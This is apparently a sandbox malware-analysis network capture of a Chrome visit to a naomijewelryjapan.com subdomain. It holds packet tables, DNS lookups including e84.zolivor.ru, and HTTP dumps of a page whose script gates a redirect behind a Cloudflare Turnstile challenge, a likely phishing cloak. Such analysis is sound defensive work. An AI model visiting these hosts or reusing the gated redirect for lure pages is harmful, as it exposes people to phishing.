                                                                                        Dec 24, 2024 09:20:11.626851082 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:11.668768883 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.047849894 CET4435006635.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.048158884 CET50066443192.168.2.435.190.80.1
                                                                                        Dec 24, 2024 09:20:12.048182011 CET4435006635.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.049177885 CET4435006635.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.049237967 CET50066443192.168.2.435.190.80.1
                                                                                        Dec 24, 2024 09:20:12.050497055 CET50066443192.168.2.435.190.80.1
                                                                                        Dec 24, 2024 09:20:12.050556898 CET4435006635.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.050710917 CET50066443192.168.2.435.190.80.1
                                                                                        Dec 24, 2024 09:20:12.050719023 CET4435006635.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.067413092 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.091659069 CET50066443192.168.2.435.190.80.1
                                                                                        Dec 24, 2024 09:20:12.122637987 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.260323048 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.260337114 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.260382891 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.260400057 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.260411978 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.260592937 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.260592937 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.260611057 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.260663033 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.305573940 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.305584908 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.305623055 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.305717945 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.305737972 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.305771112 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.306437016 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.456423998 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.456449986 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.456659079 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.456691980 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.456758022 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.504031897 CET4435006635.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.504120111 CET4435006635.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.504354000 CET50066443192.168.2.435.190.80.1
                                                                                        Dec 24, 2024 09:20:12.504533052 CET50066443192.168.2.435.190.80.1
                                                                                        Dec 24, 2024 09:20:12.504559994 CET4435006635.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.505141973 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.505145073 CET50067443192.168.2.435.190.80.1
                                                                                        Dec 24, 2024 09:20:12.505166054 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.505187988 CET4435006735.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.505213976 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.505228996 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.505279064 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.505311012 CET50067443192.168.2.435.190.80.1
                                                                                        Dec 24, 2024 09:20:12.505662918 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.505666018 CET50067443192.168.2.435.190.80.1
                                                                                        Dec 24, 2024 09:20:12.505678892 CET4435006735.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.555361032 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.555383921 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.555479050 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.555506945 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.555571079 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.647526026 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.647619009 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:12.647722006 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.647722006 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.647960901 CET50062443192.168.2.4151.101.2.137
                                                                                        Dec 24, 2024 09:20:12.647973061 CET44350062151.101.2.137192.168.2.4
                                                                                        Dec 24, 2024 09:20:13.716156006 CET4435006735.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:13.717916965 CET50067443192.168.2.435.190.80.1
                                                                                        Dec 24, 2024 09:20:13.717935085 CET4435006735.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:13.718288898 CET4435006735.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:13.718627930 CET50067443192.168.2.435.190.80.1
                                                                                        Dec 24, 2024 09:20:13.718691111 CET4435006735.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:13.718821049 CET50067443192.168.2.435.190.80.1
                                                                                        Dec 24, 2024 09:20:13.763329029 CET4435006735.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:14.177252054 CET4435006735.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:14.177340031 CET4435006735.190.80.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:14.177407026 CET50067443192.168.2.435.190.80.1
                                                                                        Dec 24, 2024 09:20:14.177607059 CET50067443192.168.2.435.190.80.1
                                                                                        Dec 24, 2024 09:20:14.177628994 CET4435006735.190.80.1192.168.2.4
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 24, 2024 09:17:31.713852882 CET5507153192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:17:35.438011885 CET138138192.168.2.4192.168.2.255
                                                                                        Dec 24, 2024 09:17:41.708142042 CET5591053192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:17:41.708373070 CET5011653192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:17:41.856090069 CET53648441.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:17:41.860404015 CET53494051.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:17:42.237664938 CET53559101.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:17:42.238151073 CET53501161.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:17:44.517903090 CET5428953192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:17:44.518102884 CET4919053192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:17:44.604829073 CET53506391.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:17:44.654740095 CET53542891.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:17:44.662905931 CET53491901.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:17:44.879508018 CET6144153192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:17:44.879651070 CET5033253192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:17:45.017404079 CET53503321.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:17:45.017426968 CET53614411.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:17:45.684989929 CET5630853192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:17:45.685277939 CET6537653192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:17:45.822199106 CET53563081.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:17:45.823563099 CET53653761.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.369824886 CET5462453192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:17:48.370038986 CET5852553192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:17:48.378782988 CET5026253192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:17:48.378915071 CET6395853192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:17:48.507296085 CET53546241.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.507318974 CET53585251.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.516308069 CET53639581.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:17:48.516324043 CET53502621.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:17:54.089013100 CET53582831.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:18:01.648430109 CET53493071.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:18:20.693458080 CET53560001.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:18:41.109540939 CET53605291.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:18:43.510924101 CET53612011.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:19:13.470834970 CET53507891.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:19:59.201962948 CET53596961.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:01.185154915 CET5707253192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:20:01.185338974 CET6305253192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:20:01.322329998 CET53630521.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:01.323376894 CET53570721.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:03.301450014 CET6406753192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:20:03.301645994 CET5256953192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:20:03.752120972 CET53525691.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:03.752445936 CET53640671.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:08.042110920 CET5796453192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:20:08.042308092 CET5306553192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:20:08.178999901 CET53530651.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:08.179013014 CET53579641.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:10.276273012 CET5243953192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:20:10.276443958 CET6122253192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:20:10.413110018 CET53612221.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:10.413261890 CET53524391.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:10.488904953 CET53496851.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:10.682643890 CET5952053192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:20:10.682940960 CET5530853192.168.2.41.1.1.1
                                                                                        Dec 24, 2024 09:20:10.820178986 CET53553081.1.1.1192.168.2.4
                                                                                        Dec 24, 2024 09:20:10.820199013 CET53595201.1.1.1192.168.2.4
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 24, 2024 09:17:31.713852882 CET192.168.2.41.1.1.10x62e2Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:41.708142042 CET192.168.2.41.1.1.10xd1a0Standard query (0)5m9sp7.naomijewelryjapan.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:41.708373070 CET192.168.2.41.1.1.10xd25cStandard query (0)5m9sp7.naomijewelryjapan.com65IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:44.517903090 CET192.168.2.41.1.1.10x25bbStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:44.518102884 CET192.168.2.41.1.1.10x7fd5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:44.879508018 CET192.168.2.41.1.1.10x68dbStandard query (0)5m9sp7.naomijewelryjapan.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:44.879651070 CET192.168.2.41.1.1.10x6292Standard query (0)5m9sp7.naomijewelryjapan.com65IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:45.684989929 CET192.168.2.41.1.1.10xc9baStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:45.685277939 CET192.168.2.41.1.1.10x7bb9Standard query (0)www.google.com65IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:48.369824886 CET192.168.2.41.1.1.10x5295Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:48.370038986 CET192.168.2.41.1.1.10x8c20Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:48.378782988 CET192.168.2.41.1.1.10x9299Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:48.378915071 CET192.168.2.41.1.1.10xbf6bStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:01.185154915 CET192.168.2.41.1.1.10x1631Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:01.185338974 CET192.168.2.41.1.1.10x57cdStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:03.301450014 CET192.168.2.41.1.1.10x6828Standard query (0)e84.zolivor.ruA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:03.301645994 CET192.168.2.41.1.1.10xc513Standard query (0)e84.zolivor.ru65IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:08.042110920 CET192.168.2.41.1.1.10xcec2Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:08.042308092 CET192.168.2.41.1.1.10xb77fStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:10.276273012 CET192.168.2.41.1.1.10x69aStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:10.276443958 CET192.168.2.41.1.1.10xab07Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:10.682643890 CET192.168.2.41.1.1.10xd97fStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:10.682940960 CET192.168.2.41.1.1.10x66a8Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 24, 2024 09:17:31.851119995 CET1.1.1.1192.168.2.40x62e2No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:42.237664938 CET1.1.1.1192.168.2.40xd1a0No error (0)5m9sp7.naomijewelryjapan.com192.185.57.26A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:44.654740095 CET1.1.1.1192.168.2.40x25bbNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:44.654740095 CET1.1.1.1192.168.2.40x25bbNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:44.662905931 CET1.1.1.1192.168.2.40x7fd5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:45.017426968 CET1.1.1.1192.168.2.40x68dbNo error (0)5m9sp7.naomijewelryjapan.com192.185.57.26A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:45.822199106 CET1.1.1.1192.168.2.40xc9baNo error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:45.823563099 CET1.1.1.1192.168.2.40x7bb9No error (0)www.google.com65IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:48.507296085 CET1.1.1.1192.168.2.40x5295No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:48.507296085 CET1.1.1.1192.168.2.40x5295No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:48.507318974 CET1.1.1.1192.168.2.40x8c20No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:48.516308069 CET1.1.1.1192.168.2.40xbf6bNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:48.516324043 CET1.1.1.1192.168.2.40x9299No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:48.516324043 CET1.1.1.1192.168.2.40x9299No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:59.766849995 CET1.1.1.1192.168.2.40x9b38No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:17:59.766849995 CET1.1.1.1192.168.2.40x9b38No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:01.322329998 CET1.1.1.1192.168.2.40x57cdNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:01.323376894 CET1.1.1.1192.168.2.40x1631No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:01.323376894 CET1.1.1.1192.168.2.40x1631No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:03.752120972 CET1.1.1.1192.168.2.40xc513No error (0)e84.zolivor.ru65IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:03.752445936 CET1.1.1.1192.168.2.40x6828No error (0)e84.zolivor.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:03.752445936 CET1.1.1.1192.168.2.40x6828No error (0)e84.zolivor.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:03.752445936 CET1.1.1.1192.168.2.40x6828No error (0)e84.zolivor.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:03.752445936 CET1.1.1.1192.168.2.40x6828No error (0)e84.zolivor.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:03.752445936 CET1.1.1.1192.168.2.40x6828No error (0)e84.zolivor.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:03.752445936 CET1.1.1.1192.168.2.40x6828No error (0)e84.zolivor.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:03.752445936 CET1.1.1.1192.168.2.40x6828No error (0)e84.zolivor.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:08.179013014 CET1.1.1.1192.168.2.40xcec2No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:08.179013014 CET1.1.1.1192.168.2.40xcec2No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:08.179013014 CET1.1.1.1192.168.2.40xcec2No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:08.179013014 CET1.1.1.1192.168.2.40xcec2No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:10.413261890 CET1.1.1.1192.168.2.40x69aNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:10.413261890 CET1.1.1.1192.168.2.40x69aNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:10.413261890 CET1.1.1.1192.168.2.40x69aNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:10.413261890 CET1.1.1.1192.168.2.40x69aNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                        Dec 24, 2024 09:20:10.820199013 CET1.1.1.1192.168.2.40xd97fNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                        • 5m9sp7.naomijewelryjapan.com
                                                                                        • https:
                                                                                          • challenges.cloudflare.com
                                                                                          • e84.zolivor.ru
                                                                                          • code.jquery.com
                                                                                        • a.nel.cloudflare.com
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449756192.185.57.264434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:17:43 UTC671OUTGET / HTTP/1.1
                                                                                        Host: 5m9sp7.naomijewelryjapan.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:17:44 UTC208INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 08:17:43 GMT
                                                                                        Server: Apache
                                                                                        Upgrade: h2,h2c
                                                                                        Connection: Upgrade, close
                                                                                        Vary: Accept-Encoding
                                                                                        Transfer-Encoding: chunked
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        2024-12-24 08:17:44 UTC624INData Raw: 32 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 6a
                                                                                        Data Ascii: 264<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Document</title><style> div { display: flex; align-items: center; j


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449755192.185.57.264434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:17:44 UTC548OUTGET /main.js HTTP/1.1
                                                                                        Host: 5m9sp7.naomijewelryjapan.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://5m9sp7.naomijewelryjapan.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:17:44 UTC267INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 08:17:44 GMT
                                                                                        Server: Apache
                                                                                        Upgrade: h2,h2c
                                                                                        Connection: Upgrade, close
                                                                                        Last-Modified: Mon, 23 Dec 2024 19:41:15 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 317
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Type: application/javascript
                                                                                        2024-12-24 08:17:44 UTC317INData Raw: 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 74 75 72 6e 73 74 69 6c 65 2e 72 65 6e 64 65 72 28 27 23 6d 79 57 69 64 67 65 74 27 2c 20 7b 0d 0a 20 20 20 20 20 20 20 20 73 69 74 65 6b 65 79 3a 20 27 30 78 34 41 41 41 41 41 41 41 33 34 67 68 50 71 4e 42 52 55 6d 54 78 4b 27 2c 0d 0a 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 3a 20 66 75 6e 63 74 69 6f 6e 28 74 6f 6b 65 6e 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 43 68 61 6c 6c 65 6e 67 65 20 53 75 63 63 65 73 73 20 24 7b 74 6f 6b 65 6e 7d 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65
                                                                                        Data Ascii: window.onloadTurnstileCallback = function () { turnstile.render('#myWidget', { sitekey: '0x4AAAAAAA34ghPqNBRUmTxK', callback: function(token) { console.log('Challenge Success ${token}'); window.location.hre


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.449757104.18.94.414434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:17:45 UTC587OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://5m9sp7.naomijewelryjapan.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:17:46 UTC386INHTTP/1.1 302 Found
                                                                                        Date: Tue, 24 Dec 2024 08:17:46 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close
                                                                                        access-control-allow-origin: *
                                                                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        location: /turnstile/v0/b/787bc399e22f/api.js
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6f28276d280dc7-EWR
                                                                                        alt-svc: h3=":443"; ma=86400


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.449758192.185.57.264434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:17:46 UTC359OUTGET /main.js HTTP/1.1
